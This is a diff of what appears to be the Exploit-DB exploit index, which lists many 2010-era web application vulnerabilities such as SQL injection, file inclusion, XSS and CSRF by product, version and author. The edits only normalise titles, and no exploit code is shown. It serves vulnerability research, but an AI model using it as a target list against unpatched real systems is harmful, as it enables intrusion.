13880,platforms/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13881,platforms/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",php,webapps,0 -13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - 'notfound' Parameter SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 +13882,platforms/asp/webapps/13882.txt,"SAS Hotel Management System - 'notfound' SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13883,platforms/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13884,platforms/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 13885,platforms/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection",2010-06-15,"L0rd CrusAd3r",asp,webapps,0 @@ -24247,7 +24248,7 @@ id,file,description,date,author,platform,type,port 14359,platforms/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",php,webapps,0 13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 -13962,platforms/php/webapps/13962.txt,"Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting",2010-06-21,jdc,php,webapps,0 +13962,platforms/php/webapps/13962.txt,"Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Vulnerabilities",2010-06-21,jdc,php,webapps,0 13964,platforms/php/webapps/13964.txt,"Linker IMG 1.0 - Remote File Inclusion",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps,0 13966,platforms/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure",2010-06-22,Xa7m3d,php,webapps,0 13967,platforms/php/webapps/13967.txt,"Online Classified System Script - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",php,webapps,0 @@ -24259,7 +24260,7 @@ id,file,description,date,author,platform,type,port 13976,platforms/php/webapps/13976.txt,"Top Sites Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13977,platforms/php/webapps/13977.txt,"Social Community Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13978,platforms/php/webapps/13978.txt,"Job Search Engine Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 -13979,platforms/php/webapps/13979.txt,"Joomla! Component com_ybggal 1.0 - 'catid' Parameter SQL Injection",2010-06-22,v3n0m,php,webapps,0 +13979,platforms/php/webapps/13979.txt,"Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection",2010-06-22,v3n0m,php,webapps,0 13980,platforms/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0 13981,platforms/php/webapps/13981.txt,"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion",2010-06-22,kaMtiEz,php,webapps,0 13982,platforms/php/webapps/13982.txt,"Alpin CMS - 'e4700.asp?id' SQL Injection",2010-06-22,CoBRa_21,php,webapps,0 @@ -24343,7 +24344,7 @@ id,file,description,date,author,platform,type,port 14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0 14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,php,webapps,0 -14126,platforms/php/webapps/14126.txt,"Joomla! Component Gamesbox 1.0.2 - 'id' Parameter SQL Injection",2010-06-30,v3n0m,php,webapps,0 +14126,platforms/php/webapps/14126.txt,"Joomla! Component Gamesbox 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla! Component Joomanager - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0 14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps,0 14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0 @@ -24360,7 +24361,7 @@ id,file,description,date,author,platform,type,port 14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0 14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",php,webapps,0 14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection",2010-07-02,"Salvatore Fresta",php,webapps,0 -14160,platforms/php/webapps/14160.txt,"Interscan Web Security 5.0 - Permanent Cross-Site Scripting",2010-07-01,"Ivan Huertas",php,webapps,0 +14160,platforms/php/webapps/14160.txt,"Interscan Web Security 5.0 - Persistent Cross-Site Scripting",2010-07-01,"Ivan Huertas",php,webapps,0 14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (1)",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0 14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injections",2010-07-01,"Salvatore Fresta",php,webapps,0 14176,platforms/php/webapps/14176.c,"iScripts Socialware 2.2.x - Arbitrary File Upload",2010-07-02,"Salvatore Fresta",php,webapps,0 @@ -24381,7 +24382,7 @@ id,file,description,date,author,platform,type,port 14196,platforms/php/webapps/14196.txt,"Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0 14198,platforms/php/webapps/14198.txt,"WordPress Plugin Simple:Press 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0 -14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - 'show.php?id=' SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 +14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - 'show.php?id' SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 14201,platforms/php/webapps/14201.txt,"PHPaaCMS - 'list.php?id' SQL Injection",2010-07-04,CoBRa_21,php,webapps,0 14202,platforms/php/webapps/14202.txt,"iLister Listing Software - Local File Inclusion",2010-07-04,Sid3^effects,php,webapps,0 14203,platforms/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 @@ -24394,7 +24395,7 @@ id,file,description,date,author,platform,type,port 14213,platforms/php/webapps/14213.txt,"Joomla! Component com_sef - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0 14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0 14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection",2010-07-05,"ADEO Security",php,webapps,0 -14250,platforms/php/webapps/14250.txt,"Joomla! Component NeoRecruit 1.6.4 - 'Itemid' Parameter Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 +14250,platforms/php/webapps/14250.txt,"Joomla! Component NeoRecruit 1.6.4 - 'Itemid' Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0 14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0 14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0 14225,platforms/php/webapps/14225.txt,"Bs Realtor_Web Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0 @@ -24437,8 +24438,8 @@ id,file,description,date,author,platform,type,port 14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps,0 14293,platforms/php/webapps/14293.txt,"Joomla! Component Minify4Joomla - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps,0 14291,platforms/php/webapps/14291.txt,"Joomla! Component IXXO Cart - SQL Injection",2010-07-09,Sid3^effects,php,webapps,0 -14434,platforms/php/webapps/14434.txt,"Joomla! Component com_jomtube - 'user_id' Parameter Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 -14312,platforms/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection",2010-07-10,v3n0m,php,webapps,0 +14434,platforms/php/webapps/14434.txt,"Joomla! Component com_jomtube - 'user_id' Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps,0 +14312,platforms/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 - 'pid' SQL Injection",2010-07-10,v3n0m,php,webapps,0 14296,platforms/php/webapps/14296.txt,"Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps,0 14316,platforms/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,php,webapps,0 14299,platforms/php/webapps/14299.txt,"CMS Contentia - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 @@ -24546,24 +24547,24 @@ id,file,description,date,author,platform,type,port 14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,php,webapps,0 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection / Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 14495,platforms/php/webapps/14495.txt,"Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps,0 -14499,platforms/php/webapps/14499.txt,"Joomla! Component com_pbbooking 1.0.4_3 - Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 +14499,platforms/php/webapps/14499.txt,"Joomla! Component com_pbbooking 1.0.4_3 - Multiple Blind SQL Injections",2010-07-29,"Salvatore Fresta",php,webapps,0 14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 14501,platforms/php/webapps/14501.txt,"Joomla! Component com_SimpleShop - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0 14502,platforms/php/webapps/14502.txt,"Joomla! Component com_beamospetition - SQL Injection",2010-07-29,Forza-Dz,php,webapps,0 -14518,platforms/php/webapps/14518.txt,"Joomla! Component com_spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0 +14518,platforms/php/webapps/14518.txt,"Joomla! Component com_spielothek 1.6.9 - Multiple Blind SQL Injections",2010-07-31,"Salvatore Fresta",php,webapps,0 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps,0 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - modules.php SQL Injection",2010-08-02,secret,php,webapps,0 14530,platforms/php/webapps/14530.txt,"Joomla! Component CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps,0 -14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting",2010-08-02,"Juan Manuel Garcia",php,webapps,0 +14531,platforms/php/webapps/14531.pdf,"MyIT CRM - Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0 14534,platforms/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps,0 14558,platforms/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps,0 14541,platforms/php/webapps/14541.txt,"WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0 14547,platforms/windows/webapps/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow",2010-08-03,"Nahuel Riva",windows,webapps,0 14557,platforms/php/webapps/14557.txt,"sX-Shop - 'view_image.php' SQL Injection",2010-08-05,secret,php,webapps,0 14556,platforms/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps,0 -14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id=' SQL Injection",2010-08-05,secret,php,webapps,0 -14560,platforms/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusion",2010-08-05,eidelweiss,php,webapps,0 +14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id' SQL Injection",2010-08-05,secret,php,webapps,0 +14560,platforms/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusions",2010-08-05,eidelweiss,php,webapps,0 14569,platforms/php/webapps/14569.txt,"Joomla! Component com_cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 14562,platforms/php/webapps/14562.html,"Open Blog 1.2.1 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps,0 @@ -24583,7 +24584,7 @@ id,file,description,date,author,platform,type,port 14615,platforms/php/webapps/14615.txt,"phpMUR - Remote File Disclosure",2010-08-11,Offensive,php,webapps,0 14618,platforms/php/webapps/14618.txt,"Saurus CMS 4.7.0 - Remote File Inclusion",2010-08-11,LoSt.HaCkEr,php,webapps,0 14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 - webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 -14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0 +14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Persistent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - Cross-Site Request Forgery (Change Admin Password)",2010-08-12,"KOLTN S",multiple,webapps,80 14636,platforms/php/webapps/14636.txt,"Plogger - Remote File Disclosure",2010-08-13,Mr.tro0oqy,php,webapps,0 @@ -24628,18 +24629,18 @@ id,file,description,date,author,platform,type,port 14808,platforms/php/webapps/14808.pl,"Mini-CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 14809,platforms/php/webapps/14809.txt,"kontakt formular 1.1 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 14810,platforms/php/webapps/14810.txt,"Gaestebuch 1.2 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0 -14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusion",2010-08-27,eidelweiss,php,webapps,0 +14815,platforms/php/webapps/14815.txt,"pecio CMS 2.0.5 - Multiple Remote File Inclusions",2010-08-27,eidelweiss,php,webapps,0 14819,platforms/php/webapps/14819.html,"Pc4Uploader 9.0 - Cross-Site Request Forgery",2010-08-27,RENO,php,webapps,0 14820,platforms/php/webapps/14820.txt,"iGaming CMS - Multiple SQL Injections",2010-08-27,Sweet,php,webapps,0 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,asp,webapps,0 -14822,platforms/php/webapps/14822.txt,"DIY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0 +14822,platforms/php/webapps/14822.txt,"DIY-CMS 1.0 - Multiple Remote File Inclusions",2010-08-28,LoSt.HaCkEr,php,webapps,0 14823,platforms/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - 'settings.cdb' Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4/3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 14834,platforms/php/webapps/14834.txt,"Max's Guestbook - HTML Injection / Cross-Site Scripting",2010-08-29,"MiND C0re",php,webapps,0 -14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion",2010-08-29,JosS,php,webapps,0 +14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusions",2010-08-29,JosS,php,webapps,0 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0 14839,platforms/php/webapps/14839.txt,"GuestBookPlus - HTML Injection / Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0 @@ -24709,7 +24710,7 @@ id,file,description,date,author,platform,type,port 15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection",2010-09-15,vYc0d,php,webapps,0 15011,platforms/php/webapps/15011.txt,"PHP microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 15014,platforms/php/webapps/15014.txt,"PixelPost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 -36828,platforms/java/webapps/36828.txt,"JaWiki - 'versionNo' Parameter Cross-Site Scripting",2012-02-17,sonyy,java,webapps,0 +36828,platforms/java/webapps/36828.txt,"JaWiki - 'versionNo' Cross-Site Scripting",2012-02-17,sonyy,java,webapps,0 15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 15029,platforms/php/webapps/15029.txt,"phpMyFamily - Multiple Vulnerabilities",2010-09-17,Abysssec,php,webapps,0 15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0 @@ -24734,8 +24735,8 @@ id,file,description,date,author,platform,type,port 15085,platforms/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,php,webapps,0 15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps,0 15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection",2010-09-23,Gamoscu,php,webapps,0 -15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion",2010-09-23,cOndemned,php,webapps,0 -15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local File Inclusion",2010-09-24,sh00t0ut,php,webapps,0 +15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusions",2010-09-23,cOndemned,php,webapps,0 +15093,platforms/php/webapps/15093.txt,"Collaborative Passwords Manager 1.07 - Multiple Local File Inclusions",2010-09-24,sh00t0ut,php,webapps,0 15098,platforms/php/webapps/15098.txt,"FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 15114,platforms/php/webapps/15114.php,"ZenPhoto - Config Update / Command Execution",2010-09-26,Abysssec,php,webapps,0 15102,platforms/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery (Add Admin)",2010-09-24,"John Johnz",win_x86,webapps,80 @@ -24762,7 +24763,7 @@ id,file,description,date,author,platform,type,port 15151,platforms/php/webapps/15151.txt,"Webspell 4.2.1 - asearch.php SQL Injection",2010-09-29,"silent vapor",php,webapps,0 15152,platforms/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net - static Blind SQL Injection",2010-09-29,"Easy Laster",php,webapps,0 15153,platforms/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",2010-09-29,"silent vapor",php,webapps,0 -15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' Parameter SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0 +15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0 15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0 15162,platforms/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0 15163,platforms/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0 @@ -24785,7 +24786,7 @@ id,file,description,date,author,platform,type,port 15204,platforms/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,php,webapps,0 15205,platforms/php/webapps/15205.txt,"Aspect Ratio CMS - Blind SQL Injection",2010-10-04,"Stephan Sattler",php,webapps,0 15207,platforms/php/webapps/15207.txt,"Uebimiau Webmail 3.2.0-2.0 - Local File Inclusion",2010-10-04,blake,php,webapps,0 -15208,platforms/php/webapps/15208.txt,"CuteNews - 'page' Parameter Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 +15208,platforms/php/webapps/15208.txt,"CuteNews - 'page' Local File Inclusion",2010-10-05,eidelweiss,php,webapps,0 15209,platforms/php/webapps/15209.txt,"SPAW Editor 2.0.8.1 - Local File Inclusion",2010-10-05,"soorakh kos",php,webapps,0 15210,platforms/php/webapps/15210.txt,"Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection",2010-10-05,Shamus,php,webapps,0 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection",2010-10-19,"Salvatore Fresta",php,webapps,0 @@ -24838,7 +24839,7 @@ id,file,description,date,author,platform,type,port 15310,platforms/php/webapps/15310.py,"Jamb - Cross-Site Request Forgery (Add a Post)",2010-10-25,Stoke,php,webapps,0 15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0 15320,platforms/php/webapps/15320.py,"BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0 -15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 - 'dbhcms_user/SearchString' Parameter SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 +15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 - 'dbhcms_user/SearchString' SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15323,platforms/php/webapps/15323.txt,"DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0 15324,platforms/php/webapps/15324.txt,"Novaboard 1.1.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0 @@ -24897,7 +24898,7 @@ id,file,description,date,author,platform,type,port 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 -15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 +15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosures",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 15453,platforms/php/webapps/15453.txt,"Joomla! Component Cookex Agency CKForms - Local File Inclusion",2010-11-08,ALTBTA,php,webapps,0 15454,platforms/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,AtT4CKxT3rR0r1ST,php,webapps,0 15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3/4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0 @@ -24971,7 +24972,7 @@ id,file,description,date,author,platform,type,port 15615,platforms/php/webapps/15615.html,"Frog CMS 0.9.5 - Multiple Vulnerabilities",2010-11-25,"High-Tech Bridge SA",php,webapps,0 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,php,webapps,0 15623,platforms/php/webapps/15623.pl,"MemHT Portal 4.0.1 - user agent Persistent Cross-Site Scripting",2010-11-27,ZonTa,php,webapps,0 -15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS - Permanent Cross-Site Scripting",2010-11-28,Jbyte,cgi,webapps,0 +15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS - Persistent Cross-Site Scripting",2010-11-28,Jbyte,cgi,webapps,0 15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection",2010-11-28,underground-stockholm.com,asp,webapps,0 15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website - search.asp / showAlllistings.asp SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 15633,platforms/php/webapps/15633.html,"Diferior 8.03 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-29,"High-Tech Bridge SA",php,webapps,0 @@ -25076,7 +25077,7 @@ id,file,description,date,author,platform,type,port 15814,platforms/php/webapps/15814.txt,"Joomla! Component com_ponygallery - Remote File Inclusion",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps,0 15815,platforms/php/webapps/15815.txt,"Joomla! Component com_adsmanager - Remote File Inclusion",2010-12-23,AtT4CKxT3rR0r1ST,php,webapps,0 15816,platforms/php/webapps/15816.txt,"CubeCart 3.0.4 - SQL Injection",2010-12-23,Dr.NeT,php,webapps,0 -15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion",2010-12-24,v3n0m,php,webapps,0 +15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusions",2010-12-24,v3n0m,php,webapps,0 15819,platforms/php/webapps/15819.txt,"Joomla! Component com_xmovie 1.0 - Local File Inclusion",2010-12-24,KelvinX,php,webapps,0 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 - 'post.php' SQL Injection",2010-12-24,cOndemned,php,webapps,0 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - Cross-Site Request Forgery (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 @@ -25087,7 +25088,7 @@ id,file,description,date,author,platform,type,port 15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,php,webapps,0 15838,platforms/php/webapps/15838.php,"OpenClassifieds 1.7.0.3 - Chained: Captcha Bypass / SQL Injection / Persistent Cross-Site Scripting on FrontPage",2010-12-28,"Michael Brooks",php,webapps,0 15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) - Arbitrary File Upload",2010-12-25,MyDoom,php,webapps,0 -15831,platforms/php/webapps/15831.txt,"LoveCMS 1.6.2 Final - Multiple Local File Inclusion",2010-12-25,cOndemned,php,webapps,0 +15831,platforms/php/webapps/15831.txt,"LoveCMS 1.6.2 Final - Multiple Local File Inclusions",2010-12-25,cOndemned,php,webapps,0 15832,platforms/php/webapps/15832.txt,"Interact 2.4.1 - SQL Injection",2010-12-26,"IR Security",php,webapps,0 15835,platforms/php/webapps/15835.html,"pecio CMS 2.0.5 - Cross-Site Request Forgery (Add Admin)",2010-12-27,"P0C T34M",php,webapps,0 15836,platforms/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection / Cross-Site Scripting",2010-12-27,blake,php,webapps,0 @@ -25115,9 +25116,9 @@ id,file,description,date,author,platform,type,port 15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps,0 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - Cross-Site Request Forgery (Add User)",2011-01-02,AtT4CKxT3rR0r1ST,php,webapps,0 